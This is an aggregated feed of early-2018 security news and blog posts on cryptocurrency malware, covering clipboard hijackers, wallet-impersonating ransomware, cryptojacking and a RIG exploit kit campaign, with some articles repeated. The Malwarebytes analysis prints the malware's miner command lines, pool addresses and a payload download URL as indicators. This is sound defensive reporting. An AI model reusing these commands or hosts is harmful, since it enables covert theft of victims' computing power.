Specifically, the Trojan is capable of monitoring the Windows clipboard for certain types of text, and if it detects specific strings, it can modify or even replace them with ones sent by the attacker. This could mean replacing legitimate addresses and URLs with ones under the attacker’s control; a regular Bitcoin address could suddenly become one belonging to a cybercriminal. If the target pastes that address into their app, thinking it’s the legitimate one, and sends Bitcoin, the cyptocurrency will be soon be in the hands of the cybercriminal. Mind you, Evrial goes beyond Bitcoin, as it is also configured to detect strings that correspond to Litecoin, Monero, WebMoney, Qiwi addresses and Steam items trade URLs.

Evrial is just one of many Bitcoin-centric news stories lately, as cryptocurrency in general has been on practically everyone’s minds – which begs the question, is there a connection? Is the increased focus on digital currency inciting the creation of malware variants designed specifically to capitalize on Bitcoin’s boom?

In short – yes and no. Historically, cryptocurrencies have been a popular mechanism on underground markets for several years. Other digital currencies were used in the past but presented problems for bad actors due to their centralized nature. However, Blockchain technology, which powers cryptocurrencies like Bitcoin and is designed to be decentralized, allowed bad actors to protect their assets from law enforcement. Noticing this value, criminals on underground markets began to use this to their benefit well before the value of Bitcoin reached $1000+ a coin.

But soon enough Bitcoin value continued to grow and malware authors took notice, as they began to target Bitcoin wallets rather than simply trade in it. Ransomware exploded, holding victim’s files and machines hostage for almost exclusively Bitcoin payment. Malware that was traditionally sold as a scraper (to steal credit card information and passwords) was upgraded to include a cryptocurrency mining feature and was sold at a premium price.

Bad actor adoption of cryptocurrency has been both significant and quick, and notably much faster than the general population. Malware that uses, steals, and is sold with cryptocurrency is now the norm. And now as the general population’s interest in cryptocurrency has exploded, we’ve seen an increase in interest from malware authors as well. This interest has led to new malware behavior, such as Evrial’s ability to scan clipboards for cryptocurrency addresses. It’s had a major impact in how business is done in the underground.

However, it’s important to note that Bitcoin’s popularity presents its own problems. The volatile value has made the buying and selling of illicit goods problematic. Additionally, the pricing of a ransom is now askew. This has forced some markets to move to multi-coin platforms (namely incorporating Monero) as an alternative and some malware families to turn to other alt-coins to mine or steal.

All in all, cryptocurrency is no different than other motivators before it – when cybercriminals find the right opportunity to enhance their profitability, they capitalize on it. And when road blocks emerge, they find ways to maneuver around them. Now, the next step for cyber defenders is to keep their eyes peeled for what’s next, and eventually — outpace cybercriminals entirely.

To learn more about the fight against Evrial and other Trojans like it, be sure to follow us at @McAfee and @McAfee_Labs.

The post Exploring the Correlation Between Bitcoin’s Boom and Evrial’s Capabilities appeared first on McAfee Blogs.



McAfee Blogs

New ransomware dubbed MoneroPay targets crypto-fans, impersonates wallet

Crypto-fans are now being targeted by MoneroPay, a new ransomware released in a thread discussing altcoin on popular crypto forum BitcoinTalk on Jan. 6. Posing as a wallet for the SpriteCoin cryptocurrency, enthusiasts rushed to download it in the desire to make a lot of money fast.

The authors of the ransomware took advantage of the surge in interest in cryptocurrency to target some tech-savvy users. These wallets are often reported by security solutions so many users have made a habit of disabling the solution to minimize false positives.

The hackers behind MoneroPay exploited this practice and created the malware to perfectly impersonate a regular installation. Once MoneroPay was installed on their devices, it started collecting user data and passwords saved in Firefox and Chrome. The data is sent to a C2 server.

The victims figured out they were dealing with ransomware after full sync with the blockchain was completed and an announcement appeared that their data is encrypted.

According to BleepingComputer, the ransomware encrypts files with extensions affiliated with programing languages such as txt, doc, rtf, cpp, tcl, html, ppt, docx, xls, xlsx, pptx, key, pem, psd, mkv, mp4, ogv, zip, jpg, jpeg, work, pyw, hpp, cgi, rar, lua, img, iso, webm, jar, java, class, one, htm, css, vbs, eps, psf, png, apk, ps1, wallet.dat. MoneroPay adds the .encrypted extension to the infected files.

Even though crypto-fans are usually tech savvy, malware developers collect insights from multiple threads on the forum, and elsewhere, to take advantage of their weaknesses. This is precisely why they need to take extra security measures such as keeping regular backups of their data so it can be restored if encrypted or lost, and using a virtual machine to scan files before download to ensure they’re not malware.

HOTforSecurity: New ransomware dubbed MoneroPay targets crypto-fans, impersonates wallet

Crypto-fans are now being targeted by MoneroPay, a new ransomware released in a thread discussing altcoin on popular crypto forum BitcoinTalk on Jan. 6. Posing as a wallet for the SpriteCoin cryptocurrency, enthusiasts rushed to download it in the desire to make a lot of money fast.

The authors of the ransomware took advantage of the surge in interest in cryptocurrency to target some tech-savvy users. These wallets are often reported by security solutions so many users have made a habit of disabling the solution to minimize false positives.

The hackers behind MoneroPay exploited this practice and created the malware to perfectly impersonate a regular installation. Once MoneroPay was installed on their devices, it started collecting user data and passwords saved in Firefox and Chrome. The data is sent to a C2 server.

The victims figured out they were dealing with ransomware after full sync with the blockchain was completed and an announcement appeared that their data is encrypted.

According to BleepingComputer, the ransomware encrypts files with extensions affiliated with programing languages such as txt, doc, rtf, cpp, tcl, html, ppt, docx, xls, xlsx, pptx, key, pem, psd, mkv, mp4, ogv, zip, jpg, jpeg, work, pyw, hpp, cgi, rar, lua, img, iso, webm, jar, java, class, one, htm, css, vbs, eps, psf, png, apk, ps1, wallet.dat. MoneroPay adds the .encrypted extension to the infected files.

Even though crypto-fans are usually tech savvy, malware developers collect insights from multiple threads on the forum, and elsewhere, to take advantage of their weaknesses. This is precisely why they need to take extra security measures such as keeping regular backups of their data so it can be restored if encrypted or lost, and using a virtual machine to scan files before download to ensure they’re not malware.



HOTforSecurity

Security Affairs: Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data

Fortinet discovered a strain of ransomware dubbed Spritecoin ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.

Researchers from Fortinet FortiGuard Labs has discovered a strain of ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.

The ransomware poses itself as a “spritecoin” wallet, it asks users to create their desired password, but instead of downloading the block-chain it encrypts the victim’s data files.

The malware asks for a 0.3 Monero ransom ($105 USD at the time of writing) and drops on the target system a ransom note of “Your files are encrypted.”

SpriteCoin ransomware

The malware includes an embedded SQLite engine, a circumstance that leads experts to believe it also implements a credentials harvesting feature for Chrome and Firefox credential store. The malicious code appends the .encrypted file extension to encrypted files (i.e. resume.doc.encrypted).

While decrypting the files, the Spritecoin ransomware also deploys another piece of malware that is able to harvest certificates, parse images, and control the web camera.

“In a cruel twist, if the victim decides to pay and obtain a decryption key they are then delivered a new malicious executable [80685e4eb850f8c5387d1682b618927105673fe3a2692b5c1ca9c66fb62b386b], detected as W32/Generic!tr.” reads the report.

“While have not yet fully analyzed this malicious payload, we can verify that it does have the capability to activate web cameras and parse certificates and keys that will likely leave the victim more compromised than before.”

The experts speculate the ransomware is being spread via forum spam that targets users interested in cryptocurrency.

“Ransomware is usually delivered via social engineering techniques, but can also be delivered without user interaction via exploits. These often arrive (but are not limited to) via email, exploit kits, malicious crafted Excel/Word/PDF macros, or JavaScript downloaders.” states the analysis published by Fortinet.

“The attacker often uses social engineering and carefully crafted malicious emails to trick and entice the victim to run these executables. These files are often seen using compelling file names to lure the victim into opening the file. Usually, the ransomware requires some user interaction to successfully compromise the victim’s machine.”

In this case, the threat arrives as a “SpriteCoin” package (spritecoind[.]exe) under the guise of a SpriteCoin crypto-currency wallet.”

Once installed on the victim’s machine, the malware will present a user with a prompt to “Enter your desired wallet password.”

SpriteCoin ransomware

When the victims provide their credentials the Spritecoin ransomware inform users it is downloading the blockchain, while it is actually encrypting the files.

The ransomware connects to a TOR site via an Onion proxy (http://jmqapf3nflatei35[.]onion.link/*) that allows the victim to communicate with the attacker’s website without the need for a TOR connection.

Further details, including IoCs are included in the report.

Pierluigi Paganini

(Security Affairs – Spritecoin ransomware, Monero)

 

The post Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data appeared first on Security Affairs.



Security Affairs

Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data

Fortinet discovered a strain of ransomware dubbed Spritecoin ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.

Researchers from Fortinet FortiGuard Labs has discovered a strain of ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.

The ransomware poses itself as a “spritecoin” wallet, it asks users to create their desired password, but instead of downloading the block-chain it encrypts the victim’s data files.

The malware asks for a 0.3 Monero ransom ($105 USD at the time of writing) and drops on the target system a ransom note of “Your files are encrypted.”

SpriteCoin ransomware

The malware includes an embedded SQLite engine, a circumstance that leads experts to believe it also implements a credentials harvesting feature for Chrome and Firefox credential store. The malicious code appends the .encrypted file extension to encrypted files (i.e. resume.doc.encrypted).

While decrypting the files, the Spritecoin ransomware also deploys another piece of malware that is able to harvest certificates, parse images, and control the web camera.

“In a cruel twist, if the victim decides to pay and obtain a decryption key they are then delivered a new malicious executable [80685e4eb850f8c5387d1682b618927105673fe3a2692b5c1ca9c66fb62b386b], detected as W32/Generic!tr.” reads the report.

“While have not yet fully analyzed this malicious payload, we can verify that it does have the capability to activate web cameras and parse certificates and keys that will likely leave the victim more compromised than before.”

The experts speculate the ransomware is being spread via forum spam that targets users interested in cryptocurrency.

“Ransomware is usually delivered via social engineering techniques, but can also be delivered without user interaction via exploits. These often arrive (but are not limited to) via email, exploit kits, malicious crafted Excel/Word/PDF macros, or JavaScript downloaders.” states the analysis published by Fortinet.

“The attacker often uses social engineering and carefully crafted malicious emails to trick and entice the victim to run these executables. These files are often seen using compelling file names to lure the victim into opening the file. Usually, the ransomware requires some user interaction to successfully compromise the victim’s machine.”

In this case, the threat arrives as a “SpriteCoin” package (spritecoind[.]exe) under the guise of a SpriteCoin crypto-currency wallet.”

Once installed on the victim’s machine, the malware will present a user with a prompt to “Enter your desired wallet password.”

SpriteCoin ransomware

When the victims provide their credentials the Spritecoin ransomware inform users it is downloading the blockchain, while it is actually encrypting the files.

The ransomware connects to a TOR site via an Onion proxy (http://jmqapf3nflatei35[.]onion.link/*) that allows the victim to communicate with the attacker’s website without the need for a TOR connection.

Further details, including IoCs are included in the report.

Pierluigi Paganini

(Security Affairs – Spritecoin ransomware, Monero)

 

The post Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data appeared first on Security Affairs.

New Malware Hijacks Cryptocurrency Mining

This is a clever attack.

After gaining control of the coin-mining software, the malware replaces the wallet address the computer owner uses to collect newly minted currency with an address controlled by the attacker. From then on, the attacker receives all coins generated, and owners are none the wiser unless they take time to manually inspect their software configuration.

So far it hasn't been very profitable, but it -- or some later version -- eventually will be.

The State of Security: Cryptocurrency Hacks and Heists in 2017

The cryptocurrency rush took the world by storm last year. This dynamic environment lured new players, including hungry investors, miners, enthusiasts, looking to their hand at innovative startups not to mention threat actors. We witnessed blockchain splits, a boom of Initial Coin Offerings (ICOs), regulatory attempts by governments, the granting of official status to Bitcoin […]… Read More

The post Cryptocurrency Hacks and Heists in 2017 appeared first on The State of Security.



The State of Security

Cryptocurrency Hacks and Heists in 2017

The cryptocurrency rush took the world by storm last year. This dynamic environment lured new players, including hungry investors, miners, enthusiasts, looking to their hand at innovative startups not to mention threat actors. We witnessed blockchain splits, a boom of Initial Coin Offerings (ICOs), regulatory attempts by governments, the granting of official status to Bitcoin […]… Read More

The post Cryptocurrency Hacks and Heists in 2017 appeared first on The State of Security.

Cybersecurity week Round-Up (2018, Week 3)

Cybersecurity week Round-Up (2018, Week 3) -Let’s try to summarize the most important event occurred last week in 3 minutes.

The week started with the discovery of a new variant of the dreaded Mirai Botnet dubbed Okiru, for the first time a malware targets ARC based IoT devices, billions of IoT devices are potentially at risk.

Kaspersky published a report on a powerful Android malware, dubbed SkyGoFree, developed for surveillance purposes by an Italian firm. The same malware was analyzed months before by researchers at CSE Cybsec in November 2017.

Interesting also the discovery of a new variant of the KillDist wiper that targeted Windows machines in financial institutions in Latin America.

Spectre and Meltdown continue to make the headlines, many users claim problems with the installed security patches.

While Oracle announces patches for the vulnerabilities affecting the Intel CPU,

Crooks continues to focus their interest on cryptocurrencies. The BlackWallet.co web-based wallet application for the Stellar Lumen cryptocurrency suffered a DNS hijacking attack that resulted in the theft of $400,000

Security researchers at Check Point have spotted a malware family dubbed RubyMiner that is targeting web servers worldwide in an attempt to exploit their resources to mine Monero cryptocurrency.

This week emerged also the activity of Lebanese APT, dubbed Dark Caracal, that is operating at least since 2012 using a powerful Android spyware. Its arsenal also includes a Windows malware and the surveillance software FinFisher

Experts from Talos group published an interesting article on North Korea Group 123 involved in at least 6 different hacking campaigns in 2017 Last year

Pierluigi Paganini

(Security Affairs – cybersecurity)

The post Cybersecurity week Round-Up (2018, Week 3) appeared first on Security Affairs.

Why David Stockman Thinks Cryptocurrency Investors Are “Stupid Speculators”

In a statement made earlier this month, former Director of the Office of Management David Stockman stated his distrust for investors of the cryptocurrency market. In his view, the cryptocurrency market is filled with “stupid speculators” and that a “spectacular crash” is imminent. Let’s take a look at the whole statement from Mr. David Stockman […]

The post Why David Stockman Thinks Cryptocurrency Investors Are “Stupid Speculators” appeared first on Hacked: Hacking Finance.

Lasers Eyed as Way Forward for Quantum Encryption of Data, Cryptocurrencies

Researchers at the University of Southern California have developed a technology called a frequency comb that could pave the way for quantum-encryption technologies to be used to protect mobile data and digital currencies. Given yesterday’s news that cryptocurrencies remain in the crosshairs of hackers, people would surely welcome new methods to...

Read the whole entry... »

Related Stories

Webroot Threat Blog: Cyber News Rundown: Healthcare Ransomware

The Cyber News Rundown brings you the latest happenings in cybersecurity news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst, and a guy with a passion for all things security. Any questions? Just ask.

Hospital Pays Ransom to Restore Systems, Despite Having Backups

In the first cyberattack of 2018 to hit a healthcare organization, an Indiana hospital’s entire network was taken offline. Despite having full backups on-hand, the hospital paid the $55,000 Bitcoin ransom right away. Officials stated they paid the ransom to get the systems back to normal as quickly as possible, since restoring everything from their backups could have taken weeks. Fortunately for patients, no data was stolen, and the staff could continue assisting new arrivals the old-fashioned way (that’s right: pen and paper) until system functionality was restored.

Audio Attacks Used for Damaging Hard Drives

A recent collaborative study performed by two universities proved that, within a reasonable proximity, an attacker could use acoustic signals to target a hard disk drive, leading to data corruption on the device. While many people could explain why this type of attack is possible, the study determined that the attacks required not only a specific frequency based on the hard drive in question, but also a precise distance from the drive and angle of sound projection to execute a successful attack.

New Android Platform Takes Spying to New Heights

A new Android spying platform has been discovered that puts all its predecessors to shame. By implementing several new features, such as location-based audio recording, compromising WhatsApp messages, and even allowing attackers to connect the device to malicious WiFi networks, this software platform gives attackers an all-new range of methods to target victims. The platform is based around five known exploits in the Android OS, and it uses them to gain administrative access to the device.

Latest Netflix Phish Asks for User Selfie

Within the last week, a new email phishing campaign has been spotted targeting Netflix users. The email informs users that a “hold” has been placed on their account pending further information. It requests users upload a photo of themselves with an ID card and prompts them to update their billing information, before redirecting them to the real Netflix login page.

RubyMiner Found on Older Linux and Windows Servers

A new cryptocurrency miner variant has been targeting outdated system servers that run both Linux and Windows. The variant, known as RubyMiner, identifies the unsecured servers using a web server tool, then gains access via a variety of exploits to install a modified Monero miner. RubyMiner deviates from similar miners in that it focuses on machines that have likely been forgotten about, and so remain on without being regularly patched.

The post Cyber News Rundown: Healthcare Ransomware appeared first on Webroot Threat Blog.



Webroot Threat Blog

Cryptocurrency Mining Malware Infects More Than Half of Organizations Globally

More than half of organizations around the world were struck by threat actors using cryptocurrency mining tools to steal corporate computing resources last month, a trend that will likely continue in 2018, according to recent research.

The Golden Age of Cryptocurrency Crime

The popularity of bitcoin, Ethereum and other cryptocurrencies is likely fueling interest among rogue actors to prey upon the CPU power behind major websites and streaming services. According to Check Point’s most recent “Global Threat Index,” the top 100 malware included 10 different kinds of cryptocurrency mining tools. In some cases, 65 percent of a system’s resources are being drained for mining, going far beyond legitimate or legal uses of the software.

Although the cybercriminals behind such attacks aren’t necessarily going after victims’ personal data or money, the tactics are somewhat similar. Infosecurity Magazine reported that some attackers inject malicious code into ads, otherwise known as malvertising, to install cryptocurrency mining tools designed to harvest Monero. All someone would have to do is click on a pop-up ad and the process would begin without their knowledge.

Digging Into Cryptocurrency Mining Tools

Many of the cryptocurrency mining applications in question were never intended to be misused like this. As WCCF Tech pointed out, Cryptoloot and Coinhive were initially seen as ways for certain online properties to generate additional revenue, but bad actors are capitalizing on their capabilities. In other cases, sites such as Pirate Bay have taken advantage of their visitors by running these tools quietly in the background.

Check Point research also revealed that there are some downright malicious cryptocurrency mining tools on the market, such as the RIG exploit kit. SecurityBrief suggested that, for some threat actors, harvesting bitcoin might be easier and more lucrative than using ransomware to take over an individual system or device.

As the cryptocurrency gold rush gains steam, there’s no telling how many more cybercriminals are going to get in on the act.

The post Cryptocurrency Mining Malware Infects More Than Half of Organizations Globally appeared first on Security Intelligence.

Infosecurity.US: Negative Factorization of Crytocurrency

Icarus_Bitcoin_Mining_Rig.jpg

Well crafted reportage/speculative piece on the negatives of cryptocurrency via Matthew Leising and Rob Urban - writing at Bloomberg; in which the details of human psychology (as that psychology relates to both markets and cryptocurrency) are laid bare. Today's MustRead.

Permalink



Infosecurity.US

Cryptocurrency Exchanges, Students Targets of North Korea Hackers

A late-2017 state-sponsored cyber attacks by North Korea against South Korea not only targeted cryptocurrency users and exchanges, but also college students interested in foreign affairs, new research from Recorded Future has found. North Korea shows no signs of letting up on its cyber war against South Korea with state-sponsored attacks against...

Read the whole entry... »

Related Stories

Over $400,0000 worth of Stellar Lumen Cryptocurrency Stolen in BlackWallet DNS Hijack

Following a recent hijack of BlackWallet’s DNS server, hackers have allegedly stolen almost 670,000 Lumens from users’ wallets, estimated to be worth around $400,000.

BlackWallet.co is a web-based wallet application that lets users manage their Stellar Lumen Cryptocurrency (XLM). The DNS hijack allowed cybercriminals to redirect victims to an attacker-controlled server, from which they could manipulate transactions. If users had more than 20 Lumens in their wallet, the funds would automatically be transfered to the attacker’s wallet.

“If you used BlackWallet in the past then use your Secret Key and login to Stellar Account Viewer to use them. If you don’t login in the BlackWallet website your XLM is safe,” reads a warning. “Lumens are not stored in the wallets, Lumens are ALWAYS stored in the network, you just use wallets to have access to the network. If you use BlackWallet with your Secret Key then the script will steal your Secret Key and then your Lumens.”

Although the warning was posted on social media and microblogging platforms, it does seem that around $400,000 worth of cryptocurrency was stolen. In the following hours, attackers started making transactions using the stolen XLMs, effectively laundering the stolen funds and hiding their tracks.

“I am the creator of Blackwallet. Blackwallet was compromised today, after someone accessed my hosting provider account,” wrote the creator of BlackWallet. I am sincerely sorry about this and hope that we will get the funds back. I am in talks with my hosting provider to get as much information about the hacker and will see what can be done with it.”

This is not the first time hackers have made off with cryptocurrencies, and it definitely won’t be the last. Everyone who recently visited BlackWallet is strongly encouraged to move their funds to a new wallet – if any still remain.

Crypto-Miner Named the “Most Wanted” Malware for December 2017

A JavaScript-based cryptocurrency miner earned the top spot in a list of the “most wanted” malware for December 2017. For its final Global Threat Index of 2017, Check Point observed Coinhive supplant Roughted, a large-scale malvertising campaign, as the most prevalent form of malware. This Monero-miner made waves back in October 2017 when it registered […]… Read More

The post Crypto-Miner Named the “Most Wanted” Malware for December 2017 appeared first on The State of Security.

Swisscoin [SIC] cryptocurrency spam

Swisscoin is a fairly low-volume self-styled cryptocurrency that has been the target of a Necurs-based spam run starting on Saturday 13th January, and increasing in volume to huge levels on Monday. From:    Florine Fray [Fray.419@redacted.tld] Date:    15 January 2018 at 10:51 Subject:    Could this digital currency actually make you a millionaire? Every once in a while, an opportunity comes

Kodak Launches Own Cryptocurrency KODAKCoin — Stocks Surge

In a tie-up with WENN Digital, a blockchain development firm, Kodak photo-centric cryptocurrency, KODAKCoin, causing a 60 percent stock rise after the surprise announcement.

This is a part of a larger initiative called KODAKOne which will reportedly give photographers a new revenue stream and a secure work platform. The blockchain-powered image management system will supposedly create a digital ledger of rights ownership that photographers can use to register and license new and old work.

Kodak CEO Jeff Clarke said in a statement, “For photographers who’ve long struggled to assert control over their work and how it’s used, these buzzwords [“blockchain” and “cryptocurrency”] are the keys to solving what felt like an unsolvable problem.”

Kodak’s choice to move towards blockchain rather than introduce a new social media platform to serve the same purpose has sparked some discussions that the company is trying to capitalise on the current cryptocurrency fad.

KODAKCoin’s initial coin offering opens on January 31st, under SEC guidelines as a security token, and it’s open to US, UK, Canadian, and other investors.

Further information can be obtained on their website.

Tank-traps versus trappings in virtual currencies: A cybersecurity minefield

Bitcoin, the progenitor of the entire cryptocurrency boom and still the most popular virtual currency, experienced a truly heady run-up in value. Its price surge was punctuated with a crescendo midway through December, when a single bitcoin approached $20,000.

The post Tank-traps versus trappings in virtual currencies: A cybersecurity minefield appeared first on WeLiveSecurity

RIG exploit kit campaign gets deep into crypto craze

There isn’t a day that goes by without a headline about yet another massive spike in Bitcoin valuation, or a story about someone mortgaging their house to purchase the hardware required to become a serious cryptocurrency miner.

If many folks are thinking about joining the ‘crypto craze’ movement, they may be surprised to learn that they already have. We’ve documented in-browser miners before on this blog, or what we call drive-by cryptomining, but drive-by download attacks such as those via the RIG exploit kit want a piece of the action, too. While the latter is not a new trend, we have noticed an increase in malware payloads from EKs that are coin miners, and we think this is going to be something to follow for 2018.

Overview

Today, we take a look at a prolific campaign that is focused on the distribution of coin miners via drive-by download attacks. We started to notice larger-than-usual payloads from the RIG exploit kit around November 2017, a trend that has continued more recently via a campaign dubbed Ngay.

What happened is that the initial dropper contained additional binaries that contributed to its oversized nature as depicted below. Droppers from this campaign have contained one or more coin miners consistently, for at least Monero and lesser known but still popular other currencies such as Bytecoin.

One payload leads to two different coin miners.

For the same attack, these two processes will mine for the well-known Monero and Electroneum cryptocurrencies. When both executables are running, the CPU usage on the victim’s computer is maxed at 100 percent.

Distribution

The Ngay campaign, identified as such by Nao_Sec, is one of several malvertising chains that relies on the RIG exploit kit to distribute its payloads. Recently, we observed a more complex redirection chain involving bestadbid and various XML feeds upstream, eventually trickling down to the more familiar redirect to RIG.

Infection flow showing redirection to RIG EK, followed by coin miner payloads

iframe to RIG EK is inserted in Ngay’s template page

The dropped binary from RIG EK contains two other artifacts that each lead to a different coin miner and are launched in a rather unusual procedure. In the following sections, we will study their deployment mechanism.

Monero miner

Monero is one of the most well-known digital currencies that, contrary to Bitcoin, does not require special hardware and provides additional privacy benefits. Threat actors have jumped on it in via large-scale drive-by mining attacks, with the help of coin miner-purposed malware.

Here the Monero miner is downloaded after a convoluted process that also aims at registering it permanently as a running service. The extracted binary from the RIG EK payload (3yanvarya.exe) is an installer that drops several .NET modules:

.NET modules extracted from one of the two artifacts contained in RIG EK’s payload

starter.exe uses an exploit (Invoke-MS16-032) copied from this GitHub repository (It even re-uses the original license!) to elevate privileges:

Code snippet showing PowerShell code designed to elevate privileges

foxcon.exe contains two sub-modules inside: Hydra and Hand, which purport to protect and manage services:

Hydra and Hand: two modules in charge of miner services

services.exe is a service to download and manage the miner:

Miner is downloaded from a remote IP address

Finally, the Monero miner (series64.exe) is retrieved and can start the mining activity. The overall process can be summarized in the diagram below.

“C:\Windows\TEMP\series64.exe” -o 5.23.48.207:5555 -u x -p x -k -B –max-cpu-usage=30 –safe

Overview of the Monero miner deployment

Electroneum miner

Electroneum, the “mobile friendly” digital currency, has only been recently introduced but became popular almost immediately. The Android app allows anyone to mine and manage their wallet, but miners running desktop platforms can also participate.

Malware authors are abusing it via a malicious coin miner binary that is dropped from dp.exe in yet another unusual redirection chain. Indeed, it involves the Bit.ly URL shortener to retrieve a fake PNG image containing instructions for the download and eventual launch of the miner itself.

“C:\Users\[username]\AppData\Roaming\bvhost\bvhost.exe” -o etn-eu2.nanopool.org:13333 -u etnkKc…

Overview of the Electroneum miner deployment

Conclusion

As cryptocurrencies become more and more popular, we can only expect to see an increase in malicious coin miners, driven by the prospect of financial gains and increased anonymity. As the mining process has become cross-platform and achievable using regular computers, this has opened new possibilities for threat actors. Indeed, they can put hundreds of thousands of compromised machines to work mining for the latest and hottest digital currency around.

For end users, the threat of a coin miner infection may seem less impactful than, say, a banking Trojan, but perhaps that is only true in the short term. Not only can existing malware download additional payloads over the course of time, but the illicit gains from cryptomining contribute to financing the criminal ecosystem, costing billions of dollars in losses.

This particular RIG EK campaign is noteworthy for its focus on cryptominers and the way it unconventionally and at times inefficiently loads them. We will keep monitoring the drive-by download landscape to report on any change in payloads from other threat actors.

Many thanks to @hasherezade for help studying the binaries.

Indicators of compromise

RIG EK dropper

FD4A117EDFEA1075132CF7D0A2AD5376B174AFD1C924D91E9B0D124320E3177D

Redirections to downloader script

5.101.179.249
*.lolkekss[.]us
bit[.]ly/2lXCGUy

Downloader script for Electroneum miner (fake PNG)

lolkekss.usite[.]pro/DF.png
195.216.243.130

Electroneum miner (bvhost.exe)

74.115.50.111
115776615-884492032168661957.preview.editmysite[.]com/uploads/1/1/5/7/115776615/be
13CE8C6C8E9E4A06880A5F445A391E9E26BB23FCD0C6F4CC495AA5B80E626C0B

Monero miner (series64.exe)

188.225.46.219:3000/files/mh/series64.exe
F651B1C5AE7B55B765994EB6630C45A0A7F1E43EBABD801CB8B3B26BDDB09D17

Additional miner loaders via RIG EK (SHA256, size in bytes, date found):

24ff04ef166cbc94d88afd0c7a3cba78dfe2f2d9e02a273a60fcc45ced5cb484,1732969,2017-12-29
d68c5095bd7b82e28acd4df5514a54db6d6d340ada860b64b932cb014fe1ecb3,1513983,2018-01-02
5c32e0d2a69fd77e85f2eecaabeb677b6f816de0d82bf7c29c9d124a818f424f,1732965,2018-01-02
2876ceb760c5b37e03ebb3cabbfb25a175e8c3556de89af9dd9941fda183bc79,1840725,2018-01-03
bba35503156eee0aa6ecef7aa76bbe3e6d26791585aac328f895278cd1c09cb2,2819600,2018-01-04

The post RIG exploit kit campaign gets deep into crypto craze appeared first on Malwarebytes Labs.

Someone hacked Blackberry to steal computing power for mining cryptocurrency [Updated]

Cryptocurrency mining service Coinhive is again in the news for misuse by a customer, this time involving handset maker Blackberry. Apparently, someone hacked into the company’s global operations website and used it to steal visitors’ computing power to mine Monero – a digital currency.

Cryptocurrencies like Bitcoin, Ethereum and Monero are digital currencies whose numbers and / or value grows as new transactions are validated by solving complex mathematical problems. Lending your computing power to keep the blockchain alive increases the currency’s value, and also fattens your personal crypto wallet, but only if you can mine quickly enough – which requires immense computing resources, especially for the likes of Bitcoin.

Coinhive sells a cryptocurrency mining tool that allows users to embed it in a desired platform – such as a website – and mine Monero using visitors’ computing power. It advertises the tool as a more elegant alternative to displaying intrusive ads. Currently, one Monero unit is valued at around $400.

But there’s a problem with Coinhive. The service is apparently so alluring to fast-buck aficionados that it has become a one-stop-shop for bad actors. The latest such incident was reported on Reddit, where a user nicknamed “Rundvleeskroket” revealed that Blackberry was hacked for cryptocurrency mining.

A friend of Rundvleeskroket discovered the hack, and shared a screenshot of the Blackberry site’s source code where Coinhive is clearly referenced. A spokesperson for Coinhive soon joined the discussion and confirmed that someone indeed had hacked Blackberry, and a number of other sites, and used their tool for the reported nefarious purpose.

“We’re sorry to hear that our service has been misused. This specific user seems to have exploited a security issue in the Magento web shop software (and possibly others) and hacked a number of different sites,” the representative said.

Ironically, Blackberry claims to be offering the “world’s most trusted mobile security software.”

Security vendors, including Bitdefender, classify cryptocurrency miners as malware, and block them. Although Coinhive states that customers should warn their end-users of the practice, many prefer to keep their mining a secret.

The past year has seen several reports of concealed cryptocurrency mining – almost all of them involving Coinhive.

In September last year, The Pirate Bay notably ran what it called a “test pilot program” to see if mining Monero worked as an alternative to displaying ads. A month later, an engineer discovered a hidden cryptocurrency miner inside a popular Google Chrome URL shortening extension.

Oslo-based Opera Software AS recently rolled out a new version of its web browser, featuring an anti-Bitcoin mining tool. Browser extensions serving the same purpose are available for Google Chrome users as well.

Update:

BlackBerryMobile.com is operated by TCL Communication who manufactures, markets and sells BlackBerry Android smartphones globally under a brand licensing agreement with BlackBerry Limited.  Soon after this story hit the wires, a Blackberry spokesperson reached out to us to clarify some matters.

“Recently, BlackBerry Limited was alerted by a third party of an exploited security vulnerability affecting the BlackBerryMobile.com site,” the spokesperson said. “Upon notification and our own verification, BlackBerry Limited moved quickly to communicate with our partner at TCL and to temporarily redirect our links to BlackBerryMobile.com to BlackBerry.com pages.

The representative insisted that “At no time was BlackBerry.com compromised,” adding that “TCL has restored a new site with partial content and is collaborating with BlackBerry Limited to harden its site to prevent future cyberattacks.”

A Mysterious Malware That Holds The Power To Critically Damage One’s Phone

It wouldn't be wrong to state that Hack forums isn't the most "world class"  or elite gathering of cybercriminals as many of  its members as of now appear to be relative novices, and furthermore it's probable that some post about hacking methods they've never really endeavoured. In spite of the fact that experts do state that with the current buyer showcase in cryptocurrencies, even the refined hacking groups are increasingly getting into undercover or in other words clandestine mining, and once in a while running such operations close by more customary and traditional  cybercrime like data theft and dissent of service attacks.

In the same way as many other people, the hackers on the message board Hack Forums are presently exchanging tips on the most proficient method to make profit with cryptocurrencies. Be that as it may, they're not simply hoping to purchase low and offer high they are only swapping approaches to surreptitiously tackle other people's phones and PCs to further generate digital coins for themselves.

A month ago, F5 networks, a Seattle security firm reported a "sophisticated multi-stage attack" hijacking networks of computers to mine cryptocurrencies.

The assailants have been known to utilize the vulnerabilities in common server softwares, combined with Windows exploits leaked from the National security Agency, to effortlessly infiltrate the victim's systems and migrate through their networking systems.

Despite the fact that it's difficult to know how much these current crypto jacking attacks have earned altogether, yet the addresses connected to the malware variations seemed to have gotten a sum of $68,500 in the cryptographic money (cryptocurrency) monero.

In any case, in the previous year, monero-mining malware has been spotted on an extensive variety of sites, mining the currency as people streamed videos from Showtime and Ultimate Fighting Championship or only browsed the web on compromised Wi-Fi systems at Starbucks cafes. Albeit, some program expansions have been found mining the currency while the users do other things, and monero-mining malware has as of late been spotted proliferating through links on Facebook Messenger also.

Hi @Starbucks@StarbucksAr did you know that your in-store wifi provider in Buenos Aires forces a 10 second delay when you first connect to the wifi so it can mine bitcoin using a customer’s laptop? Feels a little off-brand... 

— Noah Dinkin (@imnoah) December 2, 2017

If you remember the IoT botnets, Mirai in the past, we’ve actually seen one variant this year which was mining monero coins on routers and hard disk recorders as well,” says Candid Wueest, principal threat researcher at Symantec and contributing author on a report the security company released on cryptojacking last month.

